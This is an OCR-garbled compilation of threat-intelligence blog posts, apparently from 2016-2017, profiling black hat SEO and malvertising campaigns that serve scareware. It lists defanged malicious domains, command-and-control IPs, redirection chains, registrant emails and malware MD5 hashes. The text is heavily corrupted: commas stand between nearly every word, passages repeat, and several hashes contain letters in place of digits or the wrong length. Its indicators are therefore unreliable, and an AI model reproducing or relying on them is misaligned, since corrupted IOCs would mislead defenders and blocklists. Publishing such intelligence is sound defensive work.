back, to, the, following, malicious, C &C, server, IPs: 


hxxp://checkwebspeed.net - 96.126.106.156 


Once, executed, a, sample, malware (MD5:c83962659f6773b729aa222bd5b03f2f), 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://checkwebspeed.net - 96.126.106.156 


Once, executed, a, sample, malware (MD5:e0aa08d4d98c3430204cl1bb6f4c980el1), 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://replost.com - 96.126.106.156 
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phones, 


phones, 


phones, 


phones, 


phones, 


We'll, continue, monitoring, the, campaign, and, post, updates, as, soon, as, new, devel- 
opments, take, place. 


12.6.12 Historical OSINT - Massive Black Hat SEO Campaign, Spotted in the Wild, 
Serves Scareware (2016-12-25 22:43) 


In, a, cybercrime, ecosystem, dominated, by, hundreds, of, malicious, software, releases, 
cybercriminals, continue, actively, populating, their, botnet’s, infected, population, with, hun- 
dreds, of, newly, added, socially, engineered, users, potentially, exposing, the, confidentiality, 
integrity, and, availability, of, the, affected, hosts, to, a, multi-tude, of, malicious, software, 
further, spreading, malicious, software, potentially, exposing, the, confidentiality, integrity, 
and, availability, of, the, affected, hosts, to, a, multi-tude, of, malicious, software, further, 
earning, fraudulent, revenue, in, the, process, of, obtaining, access, to, a, malware-infected, 
hosts, largely, relying, on, the, utilization, of, an, affiliate-network, based, type, of, monetizing, 
scheme. 


We've, recently, intercepted, a, currently, circulating, malicious, spam, campaign, utiliz- 
ing, blackhat, seo (search engine optmization), for, traffic, acquisition, tactics, techniques, 
and procedures, potentially, exposing, hundreds, of, thousands, of, socially, engineered, users, 
to, a, multi-tude, of, malicious, software, including, fake, security, software, also, known, as, 
scareware, with, the, cybercriminals, behind, the, campaign, successfully, earning, fraudulent, 
revenue, in, the, process, of, monetizing, the, hijacked, traffic, largely, relying, on, the, 
utilization, of, an, affiliate-network, type, of, monetization, scheme. 


In, this, post, we'll, profile, the, campaign, provide, actionable, intelligence, on, the, in- 
frastructure, behind, it, and, discuss, in-depth, the, tactics, techniques, and, procedures, of, 
the, cybercriminals, behind, it. 


Related, malicious, domains, known, to, have, participated, in, the, campaign: 


hxxp://blank _fax _forms.jevjahys.zik.dj -> hxxp://radioheadicon.cn - 216.172.154.34; 
205.164.24.44; 205.164.24.45 -> 


Related, malicious, domains, known, to, have, participated, in, the, campaign: 
hxxp://aizvfnnd.cc - Email: janice@whiteplainsrealty.com 


hxxp://bInrriwbd.cc - Email: janice@whiteplainsrealty.com 
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hxxp://errhxzp.cc - Email: janice@whiteplainsrealty.com 
hxxp://inmedkgi.cc - Email: janice@whiteplainsrealty.com 
hxxp://izdzhpdn.cc - Email: janice@whiteplainsrealty.com 
hxxp://krnflff.cc - Email: janice@whiteplainsrealty.com 
hxxp://Igixuql.cc - Email: janice@whiteplainsrealty.com 
hxxp://Isxkfoxfn.cc - Email: janice@whiteplainsrealty.com 
hxxp://mkzjuoz.cc - Email: janice@whiteplainsrealty.com 
hxxp://mobqmizg.cc - Email: janice@whiteplainsrealty.com 
hxxp://mqapagelq.cc - Email: janice@whiteplainsrealty.com 
hxxp://mrvgusfdu.cc - Email: janice@whiteplainsrealty.com 
hxxp://nurzcycxm.cc - Email: janice@whiteplainsrealty.com 
hxxp://orhhcunye.cc - Email: janice@whiteplainsrealty.com 
hxxp://pdbpczh.cc - Email: janice@whiteplainsrealty.com 
hxxp://pkuidxdy.cc - Email: janice@whiteplainsrealty.com 
hxxp://qicpfwrx.cc - Email: janice@whiteplainsrealty.com 
hxxp://ruhilmec.cc - Email: janice@whiteplainsrealty.com 
hxxp://sxkfoxfn.cc - Email: janice@whiteplainsrealty.com 
hxxp://tcygfdmc.cc - Email: janice@whiteplainsrealty.com 
hxxp://tlhaxfr.cc - Email: janice@whiteplainsrealty.com 
hxxp://vcjggcbgj.cc - Email: janice@whiteplainsrealty.com 
hxxp://xInojaz.cc - Email: janice@whiteplainsrealty.com 


hxxp://zdqvzdj.cc - Email: janice@whiteplainsrealty.com 


Sample, malicious, redirector, used, in, the, campaign: 


hxxp://bostofsten1.net 
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Related, malicious, MD5s, known, to, have, responded, to, the, same, malicious, C &C, 
server, IPs (216.172.154.34): 


MD5: ad04fd31e9868b073222b3fd2aac93f7 

MD5: 103ecb766e0deb06ccbcea0a8046b4cb 
MD5: eb0Ofab963cd37660956a7ab0c66715c2 
MD5: 00da0096bd91e89e4059c428259a6cbb 


MD5: 9b7f0e0ebf1656227de9f8f97dfd9141 


Once, executed, a, sample, malicious, executable, (MD5:ad04fd31e9868b073222b3fd2aac93f7) 
phones, back, to, the, following, malicious, C &C, server, IPs: 


hxxp://down.down988.cn - 65.19.157.228 


Once, executed, a, sample, malicious, executable, (MD5:00da0096bd91e89e4059c428259a6cbb) 
phones, back, to, the, following, malicious, C &C, server, IPs: 


hxxp://cutalot.cn - 205.164.24.43 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (205.164.24.44): 


hxxp://cycling20110829.usa.1204.net 
hxxp://pepsizone.cn 

hxxp://ysbr.cn 
hxxp://interactsession-697593.regions.com.usersetup.cn 
hxxp://ad.suoie.cn 


hxxp://ycgezkpu.cn 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs: 
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MD5: cf7a53e66e397c29ea203e025c5d6465 
MD5: 089886483353f93a36dd69f0776beace 
MD5: 528ac8f94123aaa32058f0114b8elfd2 
MD5: 4e8405bb398509f17242c0b9f614d6e4 


MD5: a364d4fe887e2e40bc1lec67ad6f9aa31 


Once, executed, a, sample, malware (MD5:cf7a53e66e397c29ea203e025c5d6465), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://blenderartists.org - 141.101.125.180 
hxxp://xibudific.cn - 50.117.122.92 
hxxp://freemonitoringservers.com 
hxxp://freemonitoringservers.com.ovh.net 
hxxp://hardwareindexx.com 


hxxp://hardwareindexx.com.ovh.net 


Once, executed, a, sample, malware (MD5:089886483353f93a36dd69f0776beace), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://freeonlinedatingtips.net - 204.197.252.70 
hxxp://xibudific.cn - 216.172.154.38 
hxxp://freemonitoringservers.com 
hxxp://freemonitoringservers.com.ovh.net 
hxxp://searchfeedbook.com 


hxxp://searchfeedbook.com.ovh.net 


Once, executed, a, sample, malware (MD5:528ac8f94123aaa32058f0114b8elfd2), phones, 
back, to, the, following, malicious, C &C, server, IPs: 
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hxxp://historykillerpro.com - 192.254.233.158 
hxxp://motherboardstest.com - 195.22.26.252 
hxxp://dolobyaudiodevice.com 
hxxp://dolbyaudiodevice.com.ovh.net 


hxxp://xibudific.cn - 50.117.116.204 


Once, executed, a, sample, malware (MD5:4e8405bb398509f17242cOb9f614d6e4), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://pcskynet.cn 
hxxp://gamepknet.cn 
hxxp://pcskynet.cn.ovh.net 
hxxp://gamepknet.cn.ovh.net 
hxxp://yes16800.cn 


hxxp://yes16800.cn.ovh.net 


Once, executed, a, sample, malware (MD5:a364d4fe887e2e40bclec67ad6f9aa31), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://136136.com - 61.129.70.87 
hxxp://xibudific.cn - 50.117.122.92 
hxxp://hothintspotonline.com 
hxxp://hothintspotonline.com.ovh.net 


hxxp://hardwareindexx.com 


Related, malicious, domains, known, to, have, responded, to, the, same, malicious, C 
&C, server, IPs (205.164.24.45): 


hxxp://17mv.com 


hxxp://criding.com 
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hxxp://criding.com 
hxxp://17mv.com 
hxxp://baudu.com 
hxxp://pwgo.cn 
hxxp://sugiwyk.cn 


hxxp://verringo.cn 


Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs: 


MD5: 9905ba7c00761a792ad8a361b4de71lea 
MD5: b83c68f7d09530181908d513eb30a002 
MD5: 78941c2c4b05f8af9a31a9f3d4c94b57 
MD5: 7a1b6153a3f00c430b09f1c7b9cf7a77 


MD5: 2776c972fa934fd080f5189be7c98a77 


Once, executed, a, sample, malware, phones, back, to, the, following, maliciuos, C &C, 
server, IPs: 


hxxp://down.down988.cn - 50.117.122.91 


Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs: 


hxxp://imagehut4.cn - 50.117.122.91 


Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs: 


hxxp://yingzi.org.cn - 50.117.116.205 
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Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs: 


hxxp://qmmmm.com.cn - 50.117.122.94 


Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs: 


hxxp://down.down988.cn - 50.117.122.94 


We'll, continue, monitoring, the, campaign, and, post, updates, as, soon, as, new, devel- 
opments, take, place. 
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13.1 January 


13.1.1 Historical OSINT - Massive Black Hat SEO Campaign, Spotted in the Wild, 
Serves Scareware - Part Two (2017-01-05 10:22) 


In, a, cybercrime, ecosystem, dominated, by, fraudulent, propositions, cybercriminals, con- 
tinue, actively, populating, their, botnet’s. infected, population, further, spreading, malicious, 
software, further, earning, fraudulent, revenue, in, the, process, of, monetizing, access, to, 


malware-infected, hosts, largely, relying, on, the, utilization, of, an, affiliate-network, based, 
type, of, monetization, scheme. 


We've, recently, intercepted, a, currently, active, malicious, black, hat, SEO (search engine 
optimization), type, of, malicious, campaign, serving, malicious, software, to, unsuspecting, 
users, further, monetizing, access, to, malware-infected, hosts, largely, relying, on, the, 
utilization, of, an, affiliate-network, based, type, of, monetization, scheme. 


In, this, post, we'll, profile, the, campaign, provide, actionable, intelligence, on, the, in- 
frastructure, behind it, and, discuss, in-depth, the, tactics, techniques, and, procedures, of, 
the, cybercriminals, behind, it. 


Related, malicious, domains, known, to, have, participated, in, the, campaign: 
hxxp://notice-of-unreported-income-email.donatehalf.com 
hxxp://911-pictures.jewishreference.com 

hxxp://911-pictures.dpakman91.com 


hxxp://9-11-quotes.midweekpolitics.com 
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Sample, URL, redirection, chain: 
hxxp://trivet.gmgroupenterprises.com/style.js - 72.29.67.237 


- hxxp://trivet.gmgroupenterprises.com/?trivettrivetgmgroupenterprisescom.swf 
- hxxp://vpizdutebygugol.xorg.pl/go/ - 193.203.99.111 


- hxxp://vpizdutebygugol.xorg.pl/go4/ 
- hxxp://http://free-checkpc.com/I/d709f38e78s84y76u - 193.169.12.5 


- hxxp://safe-fileshere.com/s/w58238e9a6dh76k73r/setup .exe - 193.169.12.5 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (193.203.99.111): 


MD5: b761960b60f2e5617b4da2e303969ff1 
MD5: a27ae350b9d29b13749b14e376a00b52 
MD5: adbad83fadc017d60972efa65eb3c230 
MD5: b1323d4c7e1f6455701d49621edfb545 


MD5: c166767c8aa7a8eee0d12a6d9646b3e8 


Once, executed, a, sample, malware (MD5: b761960b60f2e5617b4da2e303969ff1), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://bdx.xorg.pl - 193.203.99.111 


Once, executed, a, sample, malware (MD5: a27ae350b9d29b13749b14e376a00b52), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://vboxsvr.ovh.net 


hxxp://gwg.xorg.pl - 193.203.99.111 


Once, executed, a, sample, malware (MD5: adbad83fadc017d60972efa65eb3c230), phones, 
back, to, the, following, malicious, C &C, server, IPs: 
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hxxp://vboxsvr.ovh.net 


hxxp://htu.xorg.pl - 193.203.99.111 


Once, executed, a, sample, malware (MD5: b1323d4c7e1f6455701d49621ledfb545), 
phones, back, to, the, following, malicious, C &C, server, IPs: 


hxxp://htu.xorg.pl - 193.203.99.111 


Once, executed, a, sample, malware (MD5: c166767c8aa7a8eee0d12a6d9646b3e8), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://bdx.xorg.pl - 193.203.99.111 


Sample, detection, rate, for, a, sample, malicious, executable: 


MD5: 7df300b01243a42b4ddff724999cd4f7 


Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs: 


hxxp://updatepcnow.com - 208.73.211.249 


hxxp://safe-updates.com - 50.63.202.54; 54.85.196.8 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (208.73.211.249): 


MD5: 940be22f37e30c90d9fded842c23b24d 
MD5: ef29c61908f678f313aa298343845175 
MD5: 47f5002a0b9d312f28822d92a3962c81 
MD5: ba83653117a6196d8b2a52fb168b8142 


MD5: f29209f1ca6c4666207ea732c1f32978 
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Once, executed, a, sample, malware (MD5: 940be22f37e30c90d9fded842c23b24d), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://softonic-analytics.net - 46.28.209.74 
hxxp://superscan.sd.en.softonic.com - 46.28.209.70 


hxxp://www.ledyazilim.com - 213.128.83.163 


Once, executed, a, sample, malware (MD5: ef29c61908f678f313aa298343845175), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://ksandrafashion.com - 208.73.211.173 
hxxp://www.lafyeri.com 


hxxp://kulppasur.com 


Once, executed, a, sample, malware (MD5: 47f5002a0b9d312f28822d92a3962c81), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://ftuny.com/borders.php 


Once, executed, a sample, malware (MD5: ba83653117a6196d8b2a52fb168b8142), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://mhc.ir - 82.99.218.195 
hxxp://naphooclub.com - 208.73.211.173 


hxxp://mdesigner.ir - 176.9.98.58 


Once, executed, a, sample, malware (MD5: f29209f1ca6c4666207ea732c1f32978), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://ftuny.com/borders.php 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (50.63.202.54): 
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MD5: 45497b47a6df2f6216b4c4bebc572dd3 
MD5: d5585af92c512bec3009b1568c8d2f7d 
MD5: 08db02c9873c0534656901d5e9501f46 
MD5: 830622b4a0520d1b46a493f03a6a0a66 


MD5: 5eelbfa766f367393782972718d4e82f 


Once, executed, a, sample, malware (MD5: 45497b47a6df2f6216b4c4bebc572dd3), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://lordofthepings.ru - 173.254.236.159 
hxxp://poppylols.ru 
hxxp://chuckboris.ru 


hxxp://kosherpig.xyz - 195.157.15.100 


Once, executed, a, sample, malware (MD5: d5585af92c512bec3009b1568c8d2f7d), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://riddenstorm.net - 208.100.26.234 
hxxp://lordofthepings.ru - 173.254.236.159 


hxxp://yardnews.net - 104.154.95.49 


Once, executed, a, sample, malware (MD5: 08db02c9873c0534656901d5e9501f46), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://riddenstorm.net - 208.100.26.234 
hxxp://lordofthepings.ru - 173.254.236.159 


hxxp://musicbroke.net - 195.22.28.210 


Once, executed, a, sample, malware (MD5: 830b22b4a0520d1b46a493f03a6a0a66), phones, 
back, to, the, following, malicious, C &C, server, IPs: 
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hxxp://riddenstorm.net - 208.100.26.234 


hxxp://lordofthepings.ru - 173.254.236.159 


Once, executed, a, sample, malware (MD5: 5eelbfa766f367393782972718d4e82f), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://riddenstorm.net - 208.100.26.234 


hxxp://lordofthepings.ru - 173.254.236.159 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (54.85.196.8): 


MD5: 05288748ddccf2e5fedef5d9e8218fef 

MD5: 08936ff676b062a87182535bce23d901 
MD5: ea2b2ea5a0bf2b8f6403b2200e5747a7 
MD5: 8a7e330ad88dcb4ced3e5e843424f85f 


MD5: bf3d996376663feaea6031b1114eb714 


Related, malicious, domains, known, to, have, participated, in, the, campaign: 
hxxp://graves111.net - 64.86.17.47 - Email: gertrudeedickens@text2re.com 
hxxp://lending10.com 

hxxp://adriafin.com 

hxxp://7sevenseas.com 

hxxp://ironins.com 

hxxp://trdatasft.com 

hxxp://omeoqka.cn 

hxxp://trustshield.cn 


hxxp://capide.cn 
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hxxp://tds-soft.comewithus.cn 
hxxp://graves111.net 
hxxp://reversfor5.net 
hxxp://limestee.net 
hxxp://landlang.net 
hxxp://langlan.net 
hxxp://limpopos.net 


hxxp://clarksinfact.net 


Sample, URL, redirection, chain: 
hxxp://checkvirus-zone.com - 64.86.16.7 - Email: gertrudeedickens@text2re.com 


- hxxp://checkvirus-zone.com/?p= 


Sample, detection, rate, for, a, sample, malicious, executable: 


MD5: b157106188c2debab5d2f1337c708e35 


Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs: 


hxxp://pencil-netwok.com/?act=fb &1=1 &2=0 &3= - 204.11.56.48; 204.11.56.45; 
209.222.14.3; 208.73.210.215; 208.73.211.152; 204.13.160.107 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs: 


MD5: 3c3346426923504571f81caffdac698d 
MD5: ad4244794693b41c775b324c4838982a 
MD5: 6649b79938f19f7ec9d06b7ba8a7aa8e 


MD5: 0526944bfb43b14d8f72fd184cd8c259 
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MD5: 29932b0cb61011ffc4834c3b7586d956 


Once, executed, a, sample, malware (MD5: 3c3346426923504571f81caffdac698d), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://www.vancityprinters.com - 104.31.76.211 
hxxp://vancityprinters.com - 23.94.18.39 


hxxp://vinasonthanh.com - 123.30.109.9 


Once, executed, a, sample, malware (MD5: ad4244794693b41c775b324c4838982a), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://banboon.com - 204.11.56.48 
hxxp://bdb.com.my - 103.4.7.143 


hxxp://baulaung.org - 52.28.249.128 


Once, executed, a, sample, malware (MD5: 6649b79938f19f7ec9d06b7ba8a7aa8e), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://cubingapi.com - 204.11.56.48 


hxxp://error.cubingapi.com - 204.11.56.48 


Once, executed, a, sample, malware (MD5: 0526944bfb43b14d8f72fd184cd8c259), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://www.vancityprinters.com - 104.31.77.211 
hxxp://vancityprinters.com - 23.94.18.39 


hxxp://vinasonthanh.com - 123.30.109.9 


Once, executed, a, sample, malware (MD5: 29932b0cb61011ffc4834c3b7586d956), phones, 
back, to, the, following, malicious, C &C, server, IPs: 
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hxxp://vancityprinters.com - 23.94.18.39 
hxxp://vinasonthanh.com - 123.30.109.9 


hxxp://rms365x24.com - 166.78.145.90 


We'll, continue, monitoring, the, campaign, and, post, updates, as, soon, as, soon, as, 
new, developments, take, place. 


13.1.2 Historical OSINT - Malicious Malvertising Campaign, Spotted at FoxNews, 
Serves Scareware (2017-01-05 11:19) 


In, a, cybercrime, ecosystem, dominated, by, fraudulent, propositions, cybercriminals, con- 
tinue, actively, populating, their, botnet’s, infected, population, with, hundreds, of, malicious, 
releases, successfully, generating, hundreds, of, thousands, of, fraudulent, revenue, while, 
populating, their, botnet’s, infected, population, largely, relying, on, the, utilization, of, 
affiliate-network, based, type, of, monetizing, scheme. 


We've, recently, intercepted, a, currently, active, malvertising, campaign, affecting, FoxNews, 
successfully, enticing, users, into, executing, malicious, software, on, the, the, affected, 
PCs, with, the, cybercriminals, behind, it, successfully, earning, fraudulent, revenue, largely, 
relying, on, the, utilization, of, an, affiliate-network, based, type, of, monetizing, scheme. 


In, this, post, we’ll, profile, the, campaign, provide, actionable, intelligence, on, the, in- 
frastructure, behind, it, and, discuss, in-depth, the, tactics, techniques, and, procedures, of, 
the, cybercriminals, behind, it. 


Sample, URL, redirection, chain: 
hxxp://toppromooffer.com/vsm/index.html - 85.17.254.158; 69.43.161.174 


- hxxp://78.47.132.222/a12/index.php?url=http://truconv.com/?a=125 &s=4al12 - 
(78.47.132.222) 


- hxxp://redirectclicks.com/?accs=845 &tid=338 - 69.172.201.153; 176.74.176.178; 
64.95.64.194 


- hxxp://http://redirectclicks.com/?accs=845 &tid=339 
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Related, malicious, domains, known, to, have, participated, in, the, campaign: 


hxxp://truconv.com - 78.46.88.202 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (78.46.88.202): 


MD5: 473e3615795609a091a2f2d3d1be2d00 
MD5: 9e51c29682a6059b9b636db8bf7dcc25 
MD5: 08a50ebcaa471cd45b3561c33740136d 
MD5: e7d5f7a90ddfalfbe8dfce32d6e4alfl 


MD5: fcdd2790dd5b1898ef8ee29092dca757 


Once, executed, a, sample, malware (MD5: 473e3615795609a091a2f2d3d1be2d00), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://yaskiya.cyberfight.de - 78.46.88.202 


Once, executed, a, sample, malware (MD5: 9e51c29682a6059b9b636db8bf7dcc25), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://cfg111111.g0.3322.org - 118.184.176.13 
hxxp://newsoft.kilu.org - 78.46.88.202 
hxxp://myweb111111.g0.3322.org 
hxxp://35free.net - 5.61.39.56 
hxxp://newsoft1.go.3322.org 


hxxp://newsoft11.go0.3322.org 


Once, executed, a, sample, malware (MD5: 08a50ebcaa471cd45b3561c33740136d), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://darthvader.dyndns.tv 
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hxxp://www12.subdomain.com - 78.46.88.202 


Once, executed, a, sample, malware (MD5: e7d5f7a90ddfalfbe8dfce32d6e4alfl1), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://tundeghanawork.co.gp - 78.46.88.202 


Once, executed, a, sample, malware (MD5: fcdd2790dd5b1898ef8ee29092dca757), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://newsoft.go.3322.org - 221.130.179.36 
hxxp://cfg111111.g0.3322.org - 118.184.176.13 
hxxp://newsoft.kilu.org - 78.46.88.202 


hxxp://users6.nofeehost.com - 67.208.91.110 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (69.172.201.153): 


MD5: c9ca43032633584ff2ae4e4d7442f123 

MD5: a099766f448acd6b032345dfd8c5491d 
MD5: da39ccb40b1c80775e0aa3ab7cefb4b0 
MD5: 85750b93319bd2cf57e445e1b4850b08 


MD5: e521b31eb97d6d25e3d165f2fe9ca3ba 


Once, executed, a, sample, malware (MD5: c9ca43032633584ff2ae4e4d7442f123), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://os.tokoholapisa.com - 54.229.133.176 
hxxp://down2load.net - 69.172.201.153 


hxxp://cdn.download2013.net - 185.152.65.38 
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Once, executed, a, sample, malware (MD5: a099766f448acd6b032345dfd8c5491d), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://chicostara.com - 91.142.252.26 
hxxp://suewyllie.com 


hxxp://dewpoint-eg.com - 195.157.15.100 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (176.74.176.178): 


MD5: 116d07294fb4b78190f44524145eb200 
MD5: f9e71f66e3aae789b245638a00b951a8 
MD5: 1d6d4a64a9901985b8a005ea166df584 
MD5: acfala5f290c7dd4859b56b49be41038 


MD5: b63fd04a8cdf69fb7215a70ccd0aef27 


Once, executed, a, sample, malware (MD5: 116d07294fb4b78190f44524145eb200), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://www.on86.com - 69.172.201.153 


hxxp://return.uk.uniregistry.com - 176.74.176.178 


Once, executed, a, sample, malware (MD5: f9e71f66e3aae789b245638a00b951a8), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://www.linkbyte.com - 69.172.201.153 


hxxp://return.uk.uniregistry.com - 176.74.176.178 


Once, executed, a, sample, malware (MD5: 1d6d4a64a9901985b8a005ea166df584), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://www.pnmchgameserver.com - 69.172.201.153 


hxxp://return.uk.uniregistry.com - 176.74.176.178 
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Once, executed, a, sample, malware (MD5: acfala5f290c7dd4859b56b49be41038), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://www.97dn.com - 45.125.35.85 
hxxp://www.97wg.com - 69.172.201.153 


hxxp://return.uk.uniregistry.com - 176.74.176.178 


Once, executed, a, sample, malware (MD5: b63fd04a8cdf69fb7215a70ccdO0aef27), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://pajak.yogya.com - 69.172.201.153 
hxxp://www.yogya.com 


hxxp://return.uk.uniregistry.com - 176.74.176.178 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs (64.95.64.194): 


MD5: 7ca6214e3b75bc1f7a4laef3267afc29 


Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs: 


hxxp://freshtravel.net - 184.168.221.36 
hxxp://experiencetravel.net - 217.174.248.145 
hxxp://freshyellow.net 
hxxp://experienceyellow.net 
hxxp://freshclose.net 


hxxp://experienceclose.net 


Related, malicious, MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
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&C, server, IPs (69.43.161.174): 

MD5: 674fca39caf18320e5a0e5fc45527ba4 
MD5: 7017a26b53bc0402475d6b900a6c98ae 
MD5: 0b61f6dfaddd141a91c65c7f290b9358 
MD5: 4d5bc6b69db093824aa905137850e883 


MD5: 201dee0da7b7807808d681510317ab59 


Once, executed, a, sample, malware (MD5: 674fca39caf18320e5a0e5fc45527ba4), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://aahydrogen.com - 208.73.210.214 
hxxp://greatinstant.net 
hxxp://ginsdirect.net 


hxxp://autouploaders.net - 185.53.177.9 


Once, executed, a, sample, malware (MD5: 7017a26b53bc0402475d6b900a6c98ae), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://w.wfetch.com - 69.43.161.174 


hxxp://ww1.w.wfetch.com - 72.52.4.90 


Once, executed, a, sample, malware (MD5: 4d5bc6b69db093824aa905137850e883), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://greattaby.com - 69.43.161.174 


hxxp://ww41.greattaby.com - 141.8.224.79 


Once, executed, a, sample, malware (MD5: 201dee0da7b7807808d681510317ab59), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://layer-ads.de - 69.43.161.174 
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Sample, URL, redirection, chain: 


hxxp://bonuspromooffer.com - 208.91.197.46; 141.8.226.14; 204.11.56.45; 204.11.56.26; 
208.73.210.215; 208.73.211.246; 82.98.86.178 


- hxxp://promotion-offer.com/vsm/adv/5?a=cspvm-sst-ozbc-sst &l=370 &f=cs _3506417142 
&ex=1 &ed=2 &h= &sub=csp &prodabbr=3P _UVSM - 208.91.197.46; 204.11.56.48; 
204.11.56.45; 204.11.56.26; 63.156.206.202; 63.149.176.12 

- hxxp://easywebchecklive.com/1/fileslist.js - 94.247.2.215 

- hxxp://78.47.132.222/a12/index2.php 

- hxxp://78.47.132.221/a12/pdf.php?u=i 7 _0 


- hxxp://78.47.132.221/al2/aff _12.exe?u=i 7 _0 &spl=4 


Once, executed, a, sample, malware, phones, back, to, the, following, malicious, C &C, 
server, IPs (208.91.197.46): 


MD5: b13flaf8fc426e350df11565dcf281e8 
MD5: a189b3334fbd9cd35 7aedff22c672e9c 
MD5: da53b068538ff03e2fc136c7d0816e39 
MD5: ec08a877817c749597396e6b34b88e78 


MD5: b9e7bf23de901280e62fd68090b5b8fa 


Once, executed, a, sample, malware (MD5: b13flaf8fc426e350df11565dcf281e8), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://dtrack.sslsecurel.com - 193.166.255.171 
hxxp://staticrr.paleokits.net - 205.251.219.192 
hxxp://dtrack.secdls.com 


hxxp://staticrr.sslsecurel.com 


Once, executed, a, sample, malware (MD5: a189b3334fbd9cd357aedff22c672e9c), phones, 
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back, to, the, following, malicious, C &C, server, IPs: 
hxxp://staticrr.paleokits.net - 54.230.11.231 
hxxp://staticrr.sslsecurel.com - 193.166.255.171 
hxxp://staticrr.sslsecure2.com 


hxxp://staticrr.sslsecure3.com - 208.91.197.46 


Once, executed, a, sample, malware (MD5: ec08a877817c749597396e6b34b88e78), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://skyworldent.com 
hxxp://solitaireinfo.com 


hxxp://speedholidays.com - 206.221.179.26 


Once, executed, a, sample, malware (MD5: b9e7bf23de901280e62fd68090b5b8fa), phones, 
back, to, the, following, malicious, C &C, server, IPs: 


hxxp://api.v2.secdls.com 
hxxp://api.v2.sslsecurel.com - 193.166.255.171 
hxxp://api.v2.sslsecure2.com 


hxxp://api.v2.sslsecure3.com - 208.91.197.46 


Related, malicious MD5s, known, to, have, phoned, back, to, the, same, malicious, C 
&C, server, IPs: 


MD5: 969601cbf069a849197289e042792419 


We'll, continue, monitoring, the, campaign, and, post, updates, as, soon, as, new, devel- 
opments, take, place. 
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13.2 May 


13.2.1 Invitation to Join a Security Community (2017-05-29 08:26) 


Dear blog readers, as I’m currently busy launching a private security community, | decided, to 
publicly announce, its, existence. 


Topics of discussion: 
- cybercrime research 
- threat intelligence 


- malicious software 


Request an invite: dancho.danchev@hush.com 


13.2.2 Historical OSINT - Inside the 2007-2009 Series of Cyber Attacks Against Mul- 
tiple International Embassies (2017-05-29 08:28) 
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Who’s Who in Cyber Crime for 
2007? - New Media Malware 


Gang 
¢« The Gang speaks out - “get lost” and die() 


¢ Dots dots dots 


* musicbox1.cn/iframe.php refreshes 
textdesk.com - refreshing Storm Worm 
domains - eliteproject.cn; takenames.cn; 
blOcker.info; space-sms.info 


¢ French government's Lybia site hack 
assessment ends up to 208.72.168.176 - 
the gang’s main IP 


Remember, the, [1]Russian, Business, Network, and, the, New, Media, Malware, Gang? 


It’s, been, several, years, since, I, last, posted, an, update, regarding, the, group’s, ac- 
